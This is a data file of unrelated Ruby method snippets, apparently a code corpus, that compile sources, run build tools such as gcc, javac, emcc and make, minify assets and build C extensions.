"def compile\n return if changed_ruby_files.empty?\n\n errors = changed_ruby_files.each_with_object([]) do |file, es|\n output = `ruby -cw \"#{file}\" 2>&1`\n next if output == \"Syntax OK\\n\"\n\n es << output\n end\n heading('Ruby Warnings', errors.join) unless errors.empty?\n end",
"def compile\n File.chmod(0o755, start_script(root))\n augment_classpath_content\n end",
"def program\n @compile\n end",
"def compile\n exe_file = File.join(@temp_dir, 'exe')\n result = TTY::Command.new(printer: :quiet).run!('gcc', '-o', exe_file, @src_file)\n [exe_file, result]\n end",
"def compile_extension(extension, platform)\n compiler_options = compiler_options()\n compiler_class = compiler_class(extension)\n\n compiler_options[:platform] = platform\n\n compiler = compiler_class.new(extension, compiler_options)\n\n compiler.compile\n end",
"def compile\n cmd = self.command\n#puts ' + ' + cmd\n log.debug \"Invoking the compiler\"\n rc = Platform.execute cmd\n log.debug \"Compilation complete; rc=#{rc.to_s}\"\n rc\n end",
"def compile!\n new_version = generate_version\n new_abs_path = abs_path(new_version)\n return @compiled_path = current_file_path if @compile_files.empty?\n\n FileUtils.mkdir_p @min_dir unless File.exist?(@min_dir)\n js? ? compile_js!(new_abs_path) : compile_css!(new_abs_path)\n\n if not_changed?(new_abs_path, current_abs_path)\n puts \"file not changed, use current file (#{current_file_path})\"\n FileUtils.rm_rf new_abs_path\n @compiled_path = current_file_path\n else\n puts \"new file version (#{file_path(new_version)}) created\"\n @compiled_path = file_path(new_version)\n end\n end",
"def compilation_without_makefile\n # Build the program\n build_msg = `#{@build_command} *.c -o #{@pgm}`\n @log_file.puts \"\\nConstruction du programme :\\n\\n#{build_msg}\"\n end",
"def build!\n create_output_directory\n spec.source_directories.each { |d| simple_compile_directory(d) }\n compile_files(spec.all_javascript_paths)\n compile_files(spec.all_stylesheet_paths)\n write_manifest\n end",
"def compile_project\n debug_msg \" compiling #{@project_name}\"\n system(HHC_PATH, @project_name)\n end",
"def compile(exp)\n alloc_vtable_offsets(exp)\n compile_main(exp)\n end",
"def full_compile(arg, file, level, type)\n errors_log = compile(arg, file, \"errors\", level, type)\n str = \"\"\n if errors_log.eql?(\"No errors\")\n warnings_log = compile(arg, file, \"warnings\", level, type)\n str = warnings_log unless warnings_log.eql?(\"No warnings\")\n else\n str = errors_log\n end\n \n str\n\n end",
"def compile(path)\n\tif isExecutable(path) and not $link\n\t\t$keep = true\n\t\treturn path\n\tend\n\t\n\tbinaryPath = File.join($testDir, File.basename($link ? $source[0] : path, File.extname(path)))\n\n\tcompilerOutput = Tempfile.new(\"compiler\")\n\n# FIXME: If $link is true, it will only check the extension of the first argument.\n\tif File.extname($link ? $source[0] : path) == \".c\"\n\t\tsystem \"gcc -O2 -o \\\"#{binaryPath}\\\" #{path} &> #{compilerOutput.path}\"\n\telsif File.extname($link ? $source[0] : path) == \".cpp\"\n\t\tsystem \"g++ -O2 -o \\\"#{binaryPath}\\\" #{path} &> #{compilerOutput.path}\"\n\telse\n\t\t$stderr.puts \"This program only works with C or C++ source code.\"\n\t\texit 1\n\tend\n\n\tcompilerMessages = compilerOutput.read\n\n\tunless compilerMessages.empty?\n\t\tunless File.exists?(binaryPath)\n\t\t\t$stderr.puts red(\"Couldn't compile #{path}.\")\n\t\tend\n\t\t$stderr.puts yellow(\"Compiler output for #{path}:\")\n\t\t$stderr.puts compilerMessages\n\tend\n\n\tcompilerOutput.close\n\tcompilerOutput.unlink\n\n\tunless File.exists?(binaryPath)\n\t\tcleanup\n\t\texit 1\n\tend\n\n\treturn binaryPath\nend",
"def compile exp\n alloc_vtable_offsets(exp)\n compile_main(exp)\n\n # after the main function, we ouput all functions and constants\n # used and defined so far.\n output_functions\n output_vtable_thunks\n output_constants\n end",
"def compiledo\n\n end",
"def compilesubroutine\n\n end",
"def compile_to_c\n \"\"\n end",
"def compile\n compile_libraries\n compile_ohai_plugins\n compile_compliance\n compile_attributes\n compile_lwrps\n compile_resource_definitions\n compile_recipes\n end",
"def run(*args)\n if compile? && !@compiled\n rc = compile\n @compiled = true if rc == 0\n if(rc != 0)\n raise CompileException.new(rc, @compile_out, @compile_err)\n end\n end\n\n execute(args)\n end",
"def compile\n Milkrun.say \"Cleaning and assembling a new #{task} build\"\n `./gradlew clean assemble#{task}`\n @assembled = true\n Milkrun.say \"Package built to #{path}\"\n path\n end",
"def compile\n raise NotImplementedError\n end",
"def compile()\n self._compiled = <<\"JAVASCRIPT\"\n(function(repl) {\n try {\n var rc;\n #{code.join(' ')}\n repl.rc_ok(rc);\n } catch(e) {\n repl.rc_fail(e.name, e.message ? e.message : e);\n };\n})(#{replid});\nJAVASCRIPT\n self._code = []\n end",
"def compile!\n raise NotImplementedError\n end",
"def compile\n min = [@x.length, @y.length].min\n IO::File.open(@filename, 'w') do |f|\n min.times { |i| f.puts sprintf(\"%e\", @x[i]) + ' ' + sprintf(\"%e\", @y[i]) }\n end\n \"\\\"\" + @filename + \"\\\" \" + compile_options + \";\"\n end",
"def compile\n tmpdir = Dir.mktmpdir\n Dir.chdir(tmpdir) do |source_dir, build_dir|\n yield source_dir, @build_dir\n end\n\n puts \"Packaging the following files/dirs:\"\n pipe \"ls #{@build_dir}\"\n ensure\n if ENV['DEBUG']\n puts \"Source dir: #{tmpdir}\"\n else\n FileUtils.rm_rf(tmpdir)\n end\n end",
"def run(content, params = {})\n # Add filename to load path\n Uglifier.new(params).compile(content)\n end",
"def compile\n\n if all_files.join().match(/\\.coffee/) and !@has_coffee\n error \"Cannot compile coffeescript\".red\n error \"Add \".white + \"gem 'coffee-script'\".yellow + \" to your Gemfile.\"\n end\n\n if @options[:uglify] and !@uglifier\n error \"Cannot uglify javascript\".red\n error \"Add \".white + \"gem 'uglifier'\".yellow + \" to your Gemfile.\"\n end\n\n begin\n js = Stitch::Package.new(:dependencies => dependencies, :paths => @options[:paths]).compile\n js = @uglifier.compile(js) if @uglifier\n js\n rescue StandardError => e\n error \"Stitch failed to compile\".red\n error e\n false\n end\n end",
"def compileCXX(params)\n\t\tsrc = requireParam(params, :src)\n\t\ttarget = requireParam(params, :target)\n\t\totherOptions = params[:opts] || []\n\t\t\n\t\tprintAndCall(\"#{compileCmd(src)} #{otherOptions.join(' ')} #{@INCDIRS.map {|dirpath| \"-I#{dirpath}\"}.join(' ')} -o #{target} -c #{src}\")\n\tend",
"def compile\n Timer.new(:title => \"YMDP\").time do\n clean_tmp_dir do\n process_domains\n end\n end\n end",
"def compilation_with_makefile\n # Build the program\n depend_msg = `make depend 2>&1`\n build_msg = `make 2>&1`\n \n @log_file.puts \"\\nConstruction des dépendances :\\n\\n#{depend_msg}\"\n @log_file.puts \"\\nConstruction du programme :\\n\\n#{build_msg}\"\n end",
"def compile(path)\n files = getFilesInDirCompiler(path)\n filesWithLines = getFilesWithLinesCompiler(files)\n classNames = getClassNames(filesWithLines)\n functionInfo = getFunctionNameTypesFiles(filesWithLines)\n compilerInfo = [classNames, functionInfo]\n\n for i in 0..filesWithLines.size-1\n fSize = filesWithLines[i][0].size\n\n #renaming the\n compiledFileName = filesWithLines[i][0][0, fSize-5]+\".vm\"\n compiledFileXMLName = filesWithLines[i][0][0, fSize-5]+\"Out.xml\"\n tokensFileName = filesWithLines[i][0][0, fSize-5]+\"TOut.xml\"\n lines = filesWithLines[i][1]\n lines = getLines(lines)\n tokens = tokenize(lines)\n\n writeCompiledFile(tokens, compilerInfo, compiledFileName)\n writeCompiledXMLFile(tokens, classNames, compiledFileXMLName)\n writeTokensXMLFile(tokens, tokensFileName)\n puts filesWithLines[i][0] + \" was tokenized and compiled\" +\"\\n\"\n end\nend",
"def compile\n compile_body\n compile_head\n \n builder = ScriptBuilder.new @template\n builder.build_for_page @filename\n end",
"def run\n return unless setup_compilable\n\n @collection.files.values.each do |pointer|\n compiled_file = File.join(@collection.compiled_path, pointer['id'])\n\n FileUtils.mkdir_p File.dirname(compiled_file)\n FileUtils.cp_r pointer['realpath'], compiled_file\n\n Ruhoh::Friend.say { green \" > #{pointer['id']}\" }\n end\n end",
"def compile_to_c\n statements.collect { |s| s.compile_to_c }.join(\"\\n\")\n end",
"def compile\n puts BUILDPACK_MESSAGE % @buildpack_version\n\n container = component_detection('container', @containers, true).first\n no_container unless container\n\n component_detection('JRE', @jres, true).first.compile\n component_detection('framework', @frameworks, false).each(&:compile)\n\n container.compile\n\n log_cache_contents\n\n return if @deps_dir.nil? || @index.nil?\n\n FileUtils.mkdir_p File.join(@deps_dir, @index)\n File.write(\n File.join(@deps_dir, @index, 'config.yml'),\n { 'name' => 'java', 'config' => {}, 'version' => @buildpack_version.to_s(false) }.to_yaml\n )\n end",
"def compile_to_ruby\n \"\"\n end",
"def compile\n read_yml if File.exists?(@project)\n\n default_options = {}\n other_options = {}\n\n @compile_options.each do |k,v| \n if /default/.match(k)\n default_options[k] = v\n else\n other_options[k] = v\n end\n end\n\n command = \"#{@flex_sdk_bin}#{@compiler}\"\n other_options.each { |k,v| command += \" -#{k}=\\\"#{[v].flatten.join ','}\\\"\" }\n default_options.each { |k,v| command += \" -#{k}=\\\"#{[v].flatten.join ','}\\\"\" }\n command += \" #{@document_class}.as\"\n\n# puts command\n# TextMate.exit_show_html\n\n @command = command\n#TextMate.exit_show_html\n if process_output command\n# load_debugger\n display_web_player #unless ARGV[0] = \"--display\"\n# display_player\n end\nend",
"def run\n return unless setup_compilable\n\n @collection.files.values.each do |pointer|\n compiled_file = File.join(@collection.compiled_path, pointer['id'])\n FileUtils.mkdir_p File.dirname(compiled_file)\n FileUtils.cp_r pointer['realpath'], compiled_file\n Ruhoh::Friend.say { green \" > #{pointer['id']}\" }\n end\n end",
"def generate_c_source( dir, filename = self.name + '.c' )\r\n # TODO\r\n puts \"generating \" + dir + '/' + filename\r\n end",
"def run(files)\n files = files.reject { |file| file.end_with? '.h' }\n filenames = files.map { |file| File.basename(file) }\n puts \"Compiling #{filenames * ' '}...\"\n Dir.mktmpdir('rucppy') do |dir|\n compile_command = \"g++ -std=c++11 #{files * ' '} -o #{dir}/a.out\"\n # puts compile_command\n `#{compile_command}`\n system(\"#{dir}/a.out\")\n end\nend",
"def _dump(level)\n compile\n end",
"def compile(script, filename=nil, linenum=nil)\n delegate.compile(script, filename, linenum)\n end",
"def compile_program(program)\n @compile_counter = 0\n program.each_line do |line| \n self.compile_line(line) \n end\n end",
"def onCompile\n end",
"def compile(file_or_dir, options = {})\n options = {\n check_for_changes: true,\n sub_template: false,\n collect_stats: true,\n ignore_blank_lines: true\n }.merge(options)\n @scope = options[:scope]\n # Doing here so the output_directory (requiring target load) doesn't get hit if\n # it is already defined\n options[:output_directory] ||= output_directory\n @check_for_changes = options[:check_for_changes]\n @options = options\n if options[:sub_template]\n block = options.delete(:block)\n if is_erb?(file_or_dir)\n run_erb(file_or_dir, options, &block)\n else\n f = File.open(file_or_dir)\n content = f.read\n f.close\n insert(content)\n end\n else\n Origen.file_handler.resolve_files(file_or_dir, ignore_with_prefix: '_', import: :template) do |file|\n compile_file(file, options)\n end\n end\n end",
"def call(env)\n compile!\n call!(env)\n end",
"def compile\n if @app_dir.nil?\n raise 'app directory must be provided'\n elsif @version.nil? || @uri.nil? || @nosetup_zip.nil?\n raise \"Version #{@version}, uri #{@uri}, or new jrebel-nosetup.zip #{@nosetup_zip} is not available, detect needs to be invoked\"\n end\n\n jr_home = File.join(@app_dir, JR_HOME_DIR)\n FileUtils.mkdir_p(jr_home)\n FileUtils.rm_r(File.join(jr_home, JREBEL)) if Dir.exist?(File.join(jr_home, JREBEL))\n download_and_install_agent(jr_home)\n end",
"def write\n Logger.info \"Writing code to files\"\n prepare_working_dir\n process_other_source_files\n\n # Create the code\n writer_class = @writer_mode == :multiple ? Writers::MultipleFilesWriter : Writers::SingleFileWriter\n writer_class.new(@builder, @working_dir).write\n\n # Create the extconf.rb\n extconf = Writers::ExtensionWriter.new(@builder, @working_dir)\n extconf.options = @options\n extconf.write\n Logger.info \"Files written\"\n end",
"def compile(spec)\n handle_exceptions {\n @oneline = spec.index(\"\\n\").nil?\n @spec = spec.sub(/^\\s*\\n/, \"\")\n @file = find_caller_file\n @tokens = Lexer.lex(name, @spec, @oneline)\n ast = Parser.parse(tokens)\n\n help_spec = (@help == true ? \"-h,help\" : @help)\n version_spec = (@version == true ? \"--version\" : @version)\n quiet_spec = (@quiet == true ? \"-q,quiet\" : @quiet)\n verbose_spec = (@verbose == true ? \"+v,verbose\" : @verbose)\n debug_spec = (@debug == true ? \"--debug\" : @debug)\n\n @quiet_option = \n ast.inject_option(quiet_spec, \"Quiet\", \"Do not write anything to standard output\") if @quiet\n @verbose_option = \n ast.inject_option(verbose_spec, \"Increase verbosity\", \"Write verbose output\") if @verbose\n @debug_option = \n ast.inject_option(debug_spec, \"Write debug information\") if @debug\n @help_option = \n ast.inject_option(help_spec, \"Write short or long help\") { |option|\n short_option = option.short_names.first \n long_option = option.long_names.first\n [\n short_option && \"#{short_option} prints a brief help text\",\n long_option && \"#{long_option} prints a longer man-style description of the command\"\n ].compact.join(\", \")\n } if @help\n @version_option = \n ast.inject_option(version_spec, \"Write version number and exit\") if @version\n\n @grammar = Analyzer.analyze(ast)\n }\n self\n end",
"def compile_ruby\n if $DEBUG\n puts \"user_home: #{user_home}\"\n puts \"user_local: #{user_local}\"\n puts \"make_command: #{make_command}\"\n puts \"version: #{version}\"\n puts \"ruby_cc_version: #{ruby_cc_version}\"\n puts \"ruby_source: #{ruby_source}\"\n puts \"srcdir: #{srcdir}\"\n puts \"blddir: #{blddir}\"\n puts \"libdir: #{libdir}\"\n end\n\n mingw32\n environment\n download_source\n extract_source\n makefile_in_bak # create Makefile.in.bak\n makefile_in # create Makefile.in\n configure # create Makefile\n make # creates ruby.exe\n make_install\n update_config\n end",
"def run\n start = Time.now\n log \"[0/3] Generating build\"\n generate_build\n\n log \"[1/3] Building\"\n filename = build\n\n log \"[2/3] Parsing\"\n\n @config[:parser].parse(filename)\n log \"[3/3] Complete\"\n\n Time.now - start\n end",
"def compile obj, src\n sh \"gcc #{$C_FLAGS.join ' '} -c #{src} -o #{obj}\"\nend",
"def compileFortran(params)\n\t\tsrc = requireParam(params, :src)\n\t\ttarget = requireParam(params, :target)\n\t\totherOptions = params[:opts] || []\n\t\t\n\t\tprintAndCall(\"#{compileCmd(src)} #{otherOptions.join(' ')} #{@INCDIRS.map {|dirpath| \"-I#{dirpath}\"}.join(' ')} -o #{target} -c #{src}\")\n\tend",
"def setup_java_extension(extension_name, gem_spec = nil, opts = {})\n ext_name = \"#{extension_name}.jar\"\n directory 'lib'\n opts = {\n :source_dir => 'ext-java/src/main/java',\n :add_buildr_task => true\n }.merge!(opts)\n\n desc 'Compile Extension for current Ruby (= compile:jruby)'\n task :compile => [ 'compile:jruby' ] if JRUBY\n\n namespace :compile do\n\n desc \"Compile Java Extension for JRuby\"\n task :jruby => [ :clean ] do\n pkg_classes = File.join(*%w(pkg classes))\n mkdir_p pkg_classes\n\n if extension_name == 'do_jdbc_internal'\n classpath_arg = java_classpath_arg\n else\n unless File.exists?('../do_jdbc/lib/do_jdbc_internal.jar')\n # Check for the presence of do_jdbc_internal.jar in the do_jdbc project\n # which we need to compile against.\n print \"\\n\"; 80.times { print '-' }; print \"\\n\"\n puts \"To compile the Java extension, #{extension_name}, you will first need to compile\"\n puts \"common JDBC support for DataObjects, do_jdbc:\"\n puts \"cd ../do_jdbc; jruby -S rake compile\"\n 80.times { print '-' }; print \"\\n\\n\"\n\n raise \"Required file for compilation (do_jdbc_internal.jar) not found.\"\n end\n\n classpath_arg = java_classpath_arg '../do_jdbc/lib/do_jdbc_internal.jar'\n end\n\n # just use the extension directory from the executing java\n # for compilation as well\n extdir = java.lang.System.getProperty('java.ext.dirs')\n extdir_arg = extdir.nil? ? \"\" : \"-extdirs #{extdir}\"\n\n # Check if DO_JAVA_DEBUG env var was set to TRUE\n # TRUE means compile java classes with debug info\n if ENV['DO_JAVA_DEBUG'] && ENV['DO_JAVA_DEBUG'].upcase.eql?(\"TRUE\")\n sh \"javac #{extdir_arg} -target 1.5 -source 1.5 -Xlint:unchecked -g -d pkg/classes #{classpath_arg} #{FileList[\"#{opts[:source_dir]}/**/*.java\"].join(' ')}\"\n else\n sh \"javac #{extdir_arg} -target 1.5 -source 1.5 -Xlint:unchecked -d pkg/classes #{classpath_arg} #{FileList[\"#{opts[:source_dir]}/**/*.java\"].join(' ')}\"\n end\n\n sh \"jar cf lib/#{ext_name} -C #{pkg_classes} .\"\n end\n\n if opts[:add_buildr_task]\n desc \"Compile Java Extension for JRuby (with buildr)\"\n task :jruby_buildr do\n begin\n # gem 'buildr', '~>1.3'\n # FIXME: this is throwing RSpec activation errors, as buildr relies on\n # an older version of Rake.\n\n sh %{#{RUBY} -S buildr package}\n\n buildr_output = extension_name.gsub(/_(ext)$/, '-\\1-java-1.0.jar')\n cp \"ext-java/target/#{buildr_output}\", \"lib/#{ext_name}\"\n rescue LoadError\n puts \"#{spec.name} requires the buildr gem to compile the Java extension\"\n end\n end\n end\n\n end\n file \"lib/#{ext_name}\" => 'compile:jruby'\n\nend",
"def compile\n @version, @uri = Ruby.find_ruby(@configuration)\n\n download_start_time = Time.now\n if @uri.include? '://'\n print \"-----> Downloading #{@version} ruby from #{@uri} ... \"\n else\n filename = File.basename(@uri)\n print \"-----> Retrieving #{@version} ruby (#{filename}) ... \"\n end\n LibertyBuildpack::Util::Cache::ApplicationCache.new.get(@uri) do |file| # TODO: Use global cache\n puts \"(#{(Time.now - download_start_time).duration})\"\n expand file\n end\n end",
"def compile_assets\n boot_rails\n run_compiler\n \n !failed?\n end",
"def compile_assets\n boot_rails\n run_compiler\n \n !failed?\n end",
"def compile!\n puts \"Compiling website..\"\n puts %x[rm -rf output]\n puts %x[nanoc compile]\nend",
"def compile!\n puts \"Compiling website..\"\n puts %x[rm -rf output]\n puts %x[nanoc compile]\nend",
"def compile!\n puts \"Compiling website..\"\n puts %x[rm -rf output]\n puts %x[nanoc compile]\nend",
"def compile\n Tipsy::Runners::Compiler.new(@args, @site)\n end",
"def compile(build_folder, check: false, write: false, release: false, verbose: false, use_cache: true)\n @file_resolver = FileResolver.new(Config.instance.project_path, build_folder)\n compilation_context.file_resolver = @file_resolver\n compilation_context.should_check = check\n compilation_context.should_write = write\n compilation_context.release_build = release\n compilation_context.verbose = verbose\n compilation_context.use_cache = use_cache\n\n self.class.globals_tracker.catch do\n @build_folder = build_folder\n\n FileUtils.mkdir_p(build_folder)\n\n puts \" handling target #{@target.name.inspect} in build dir `#{Config.instance.pretty_path_from_project(build_folder)}`\"\n\n file_resolver.add_file(FileTypes::SourceFile.new(Config.instance.pretty_path_from_project(@book.file_path).to_s))\n compilation_context.plugins\n\n parse_toc_item(@target.root_toc)\n parse_target_file_requests\n\n process_all_target_files\n generate_other_files\n\n # build folder cleanup\n remove_unnecessary_files\n remove_empty_folders\n\n source_paths = file_resolver.files.select { |a| a.is_a?(FileTypes::SourceFile) }.map { |a| a.source_path }\n compilation_context.source_file_database.cleanup(source_paths)\n compilation_context.source_file_database.update_all_metadata\n compilation_context.source_file_database.save_to_file\n\n compilation_context.target_file_database.cleanup(source_paths)\n compilation_context.target_file_database.update_all_metadata\n compilation_context.target_file_database.save_to_file\n end\n ensure\n self.class.globals_tracker.clear_all\n end",
"def compile_to_ruby\n statements.collect { |s| s.compile_to_ruby }.join(\"\\n\")\n end",
"def compile_file(path)\n path = \"#{path}.rb\" unless path =~ /\\.rb\\Z/\n res = RubyVM::InstructionSequence.compile_file(path)\n data = Marshal.dump(res.to_a)\n rbc_path = path + \"c\"\n File.open(rbc_path, \"w+\") {|f| f.write data }\n rescue NotImplementedError\n # Ruby bug with terminated objects\n false\n end",
"def compile(*args)\n\t filtered_args, vm = prepare_call(args)\n\t CompiledCall.new(self, filtered_args, vm)\n\tend",
"def do_compile_command(name, file)\n output, result = compile_file(name)\n output = clean_debug(output)\n if (output != \"\" || result != 0)\n puts \"----------------------------------------------------------------------\"\n puts \"BUG: %s failed to compile\" % name\n puts \"----------------------------------------------------------------------\"\n puts output\n puts \"----------------------------------------------------------------------\"\n exit 1\n end\nend",
"def build\n so_name = self.so_name\n so_exists = File.file? so_name\n unless so_exists and File.mtime(rb_file) < File.mtime(so_name) then\n\n unless File.directory? Inline.directory then\n warn \"NOTE: creating #{Inline.directory} for RubyInline\" if $DEBUG\n Dir.mkdir Inline.directory, 0700\n end\n\n src_name = \"#{Inline.directory}/#{module_name}.c\"\n old_src_name = \"#{src_name}.old\"\n should_compare = File.write_with_backup(src_name) do |io|\n if @include_ruby_first\n @inc.unshift \"#include \\\"ruby.h\\\"\"\n else\n @inc.push \"#include \\\"ruby.h\\\"\"\n end\n\n io.puts\n io.puts @inc.join(\"\\n\")\n io.puts\n io.puts @src.join(\"\\n\\n\")\n io.puts\n io.puts\n io.puts \"#ifdef __cplusplus\"\n io.puts \"extern \\\"C\\\" {\"\n io.puts \"#endif\"\n io.puts \" __declspec(dllexport)\" if WINDOZE\n io.puts \" void Init_#{module_name}() {\"\n io.puts \" VALUE c = rb_cObject;\"\n\n # TODO: use rb_class2path\n # io.puts \" VALUE c = rb_path2class(#{@mod.name.inspect});\"\n io.puts @mod.name.split(\"::\").map { |n|\n \" c = rb_const_get(c,rb_intern(\\\"#{n}\\\"));\"\n }.join(\"\\n\")\n\n @sig.keys.sort.each do |name|\n arity, singleton, method_name = @sig[name]\n if singleton then\n io.print \" rb_define_singleton_method(c, \\\"#{method_name}\\\", \"\n else\n io.print \" rb_define_method(c, \\\"#{method_name}\\\", \"\n end\n io.puts \"(VALUE(*)(ANYARGS))#{name}, #{arity});\"\n end\n io.puts @init_extra.join(\"\\n\") unless @init_extra.empty?\n\n io.puts\n io.puts \" }\"\n io.puts \"#ifdef __cplusplus\"\n io.puts \"}\"\n io.puts \"#endif\"\n io.puts\n end\n\n # recompile only if the files are different\n recompile = true\n if so_exists and should_compare and\n FileUtils.compare_file(old_src_name, src_name) then\n recompile = false\n\n # Updates the timestamps on all the generated/compiled files.\n # Prevents us from entering this conditional unless the source\n # file changes again.\n t = Time.now\n File.utime(t, t, src_name, old_src_name, so_name)\n end\n\n if recompile then\n\n hdrdir = %w(srcdir archdir rubyhdrdir).map { |name|\n Config::CONFIG[name]\n }.find { |dir|\n dir and File.exist? File.join(dir, \"/ruby.h\")\n } or abort \"ERROR: Can't find header dir for ruby. Exiting...\"\n\n flags = @flags.join(' ')\n libs = @libs.join(' ')\n\n config_hdrdir = if RUBY_VERSION > '1.9' then\n \"-I #{File.join hdrdir, RbConfig::CONFIG['arch']}\"\n else\n nil\n end\n\n cmd = [ Config::CONFIG['LDSHARED'],\n flags,\n Config::CONFIG['CCDLFLAGS'],\n Config::CONFIG['CFLAGS'],\n '-I', hdrdir,\n config_hdrdir,\n '-I', Config::CONFIG['includedir'],\n \"-L#{Config::CONFIG['libdir']}\",\n '-o', so_name.inspect,\n File.expand_path(src_name).inspect,\n libs,\n crap_for_windoze ].join(' ')\n\n # TODO: remove after osx 10.5.2\n cmd += ' -flat_namespace -undefined suppress' if\n RUBY_PLATFORM =~ /darwin9\\.[01]/\n cmd += \" 2> #{DEV_NULL}\" if $TESTING and not $DEBUG\n\n warn \"Building #{so_name} with '#{cmd}'\" if $DEBUG\n result = `#{cmd}`\n warn \"Output:\\n#{result}\" if $DEBUG\n if $? 
!= 0 then\n bad_src_name = src_name + \".bad\"\n File.rename src_name, bad_src_name\n raise CompilationError, \"error executing #{cmd.inspect}: #{$?}\\nRenamed #{src_name} to #{bad_src_name}\"\n end\n\n # NOTE: manifest embedding is only required when using VC8 ruby\n # build or compiler.\n # Errors from this point should be ignored if Config::CONFIG['arch']\n # (RUBY_PLATFORM) matches 'i386-mswin32_80'\n if WINDOZE and RUBY_PLATFORM =~ /_80$/ then\n Dir.chdir Inline.directory do\n cmd = \"mt /manifest lib.so.manifest /outputresource:so.dll;#2\"\n warn \"Embedding manifest with '#{cmd}'\" if $DEBUG\n result = `#{cmd}`\n warn \"Output:\\n#{result}\" if $DEBUG\n if $? != 0 then\n raise CompilationError, \"error executing #{cmd}: #{$?}\"\n end\n end\n end\n\n warn \"Built successfully\" if $DEBUG\n end\n\n else\n warn \"#{so_name} is up to date\" if $DEBUG\n end # unless (file is out of date)\n end",
"def build_core\n code = ''\n\n code += File.read(RUNTIME_PATH)\n code += build_stdlib('core.rb', 'core/*.rb')\n code += \"opal.require('core');\"\n\n code\n end",
"def compile(compilable)\r\n compiler = File.expand_path @compiler_exe, @compiler_path\r\n result = []\r\n \r\n compilable.compiler_target_files.each do |target_file|\r\n # Construct paths.\r\n include_paths = \"-I#{compilable.compiler_include_paths.join ';'}\" unless\r\n compilable.compiler_include_paths.empty?\r\n \r\n module_paths = \"-M#{compilable.compiler_module_paths.join ';'}\" unless\r\n compilable.compiler_module_paths.empty?\r\n \r\n library_paths = \"-L#{compilable.compiler_library_paths.join ';'}\" unless\r\n compilable.compiler_library_paths.empty?\r\n \r\n # Run the NetLinx compiler.\r\n # Note: NLRC.exe v2.1 freaks out if empty arguments (\"\") are in the command.\r\n cmd = ''\r\n cmd += 'wine ' if @use_wine or compiler.include? '/.wine/'\r\n cmd += \"\\\"#{compiler}\\\" \\\"#{target_file}\\\"\"\r\n cmd += \" \\\"#{include_paths}\\\"\" if include_paths\r\n cmd += \" \\\"#{module_paths}\\\"\" if module_paths\r\n cmd += \" \\\"#{library_paths}\\\"\" if library_paths\r\n \r\n io = IO.popen cmd\r\n stream = io.read\r\n io.close\r\n \r\n # Build the result.\r\n result << NetLinx::CompilerResult.new(\r\n compiler_target_files: [target_file],\r\n compiler_include_paths: compilable.compiler_include_paths,\r\n compiler_module_paths: compilable.compiler_module_paths,\r\n compiler_library_paths: compilable.compiler_library_paths,\r\n stream: stream\r\n )\r\n end\r\n \r\n result\r\n end",
"def compile(filename)\n # First pass - define labels\n elements.each do |codeline|\n codeline.register_labels\n @@position += codeline.size\n end\n\n # Second pass - write to binary file\n File.open(filename, 'wb') do |f|\n elements.each do |codeline|\n f.write codeline.to_bin\n end\n end\n end",
"def setup_c_extension(extension_name, gem_spec = nil)\n # use the DLEXT for the true extension name\n ext_name = \"#{extension_name}.#{RbConfig::CONFIG['DLEXT']}\"\n\n # we need lib\n directory 'lib'\n\n # verify if the extension is in a folder\n ext_dir = File.join('ext', extension_name)\n unless File.directory?(ext_dir)\n # the extension is in the root of ext.\n ext_dir = 'ext'\n end\n\n # getting this file is part of the compile task\n desc \"Compile Extension for current Ruby (= compile:mri)\"\n task :compile => [ 'compile:mri' ] unless JRUBY\n\n namespace :compile do\n desc 'Compile C Extension for Ruby 1.8 (MRI)'\n task :mri => [:clean, \"rake:compile:lib/#{ext_name}\"]\n\n task \"#{ext_dir}/#{ext_name}\" => FileList[\"#{ext_dir}/Makefile\", \"#{ext_dir}/*.c\", \"#{ext_dir}/*.h\"] do\n # Visual C make utility is named 'nmake', MinGW conforms GCC 'make' standard.\n make_cmd = RUBY_PLATFORM =~ /mswin/ ? 'nmake' : 'make'\n Dir.chdir(ext_dir) do\n sh make_cmd\n end\n end\n\n file \"#{ext_dir}/Makefile\" => \"#{ext_dir}/extconf.rb\" do\n Dir.chdir(ext_dir) do\n ruby 'extconf.rb'\n end\n end\n\n task \"lib/#{ext_name}\" => ['lib', \"#{ext_dir}/#{ext_name}\"] do\n cp \"#{ext_dir}/#{ext_name}\", \"lib/#{ext_name}\"\n end\n end\n\n unless Rake::Task.task_defined?('native')\n if gem_spec\n desc \"Build Extensions into native binaries.\"\n task :native => [:compile] do |t|\n # use CURRENT platform instead of RUBY\n gem_spec.platform = Gem::Platform::CURRENT\n\n # clear the extension (to avoid RubyGems firing the build process)\n gem_spec.extensions.clear\n\n # add the precompiled binaries to the list of files\n # (taken from compile task dependency)\n gem_spec.files += Rake::Task['compile'].prerequisites\n end\n end\n end\nend",
"def compile(pattern, options)\n log.header 'Compile'\n each_solution(pattern) do |solution|\n build_manager = BuildManager.new(solution)\n build_manager.build(options[:debug], options[:update_version])\n end\n end",
"def compile\n '(%s = %s; %s %s []; %s; %s.join)' % [\n RESULT_VARIABLE_BACKDOOR,\n @result_variable.inspect,\n\n @result_variable,\n @continue_result ? '||=' : '=',\n\n @source_lines.map do |source_line|\n compiled_line = []\n combine_prev = false\n\n source_line.each do |stmt|\n is_code = stmt.type == :code\n is_expr = stmt.type == :expr\n\n if is_code\n compiled_line << stmt.value\n combine_prev = false\n\n else\n code =\n if is_expr\n \" << (#{stmt.value.strip})\"\n else\n \" << #{stmt.value.inspect}\"\n end\n\n if combine_prev\n compiled_line.last << code\n else\n compiled_line << @result_variable.to_s + code\n end\n\n combine_prev = true\n end\n end\n\n compiled_line.join('; ')\n\n end.join(\"\\n\"),\n\n @result_variable,\n ]\n end",
"def compile(filename)\n check_cookie\n Native::magic_compile(@cookie, filename);\n end",
"def build(rb_file)\n# Clean up the build directory\n FileUtils.rm_rf 'tmp'\n\n # Check if source file provided is good\n if !rb_file\n puts 'Please provide a Ruby file to build'\n exit\n elsif !File.exists? \"/src/#{rb_file}\"\n puts \"Can't find file: #{rb_file}\"\n exit\n end\n\n # Create the build directory\n FileUtils.mkdir_p 'tmp'\n\n # Create MRuby bytecode from Ruby source file\n `mrbc -Bruby_app -otmp/app.c /src/#{rb_file}`\n\n `cat tmp/app.c`\n # Add MRuby init code to app bytecode\n open('tmp/app.c', 'a') do |f|\n f << \"\\n\\n\" << File.read(\"/build/utils/assets/mruby_init.c\")\n end\n\n # Compile using Emscripten\n `emcc -s WASM=1 #{ if @optimize then '-Os' end } -I '/build/mruby/include' tmp/app.c /build/mruby/build/emscripten/lib/libmruby.a -o app.js #{ if @optimize then '--closure 1' end }`\n\n # Clean up\n FileUtils.rm_rf 'tmp'\nend",
"def compilelet\n\n end",
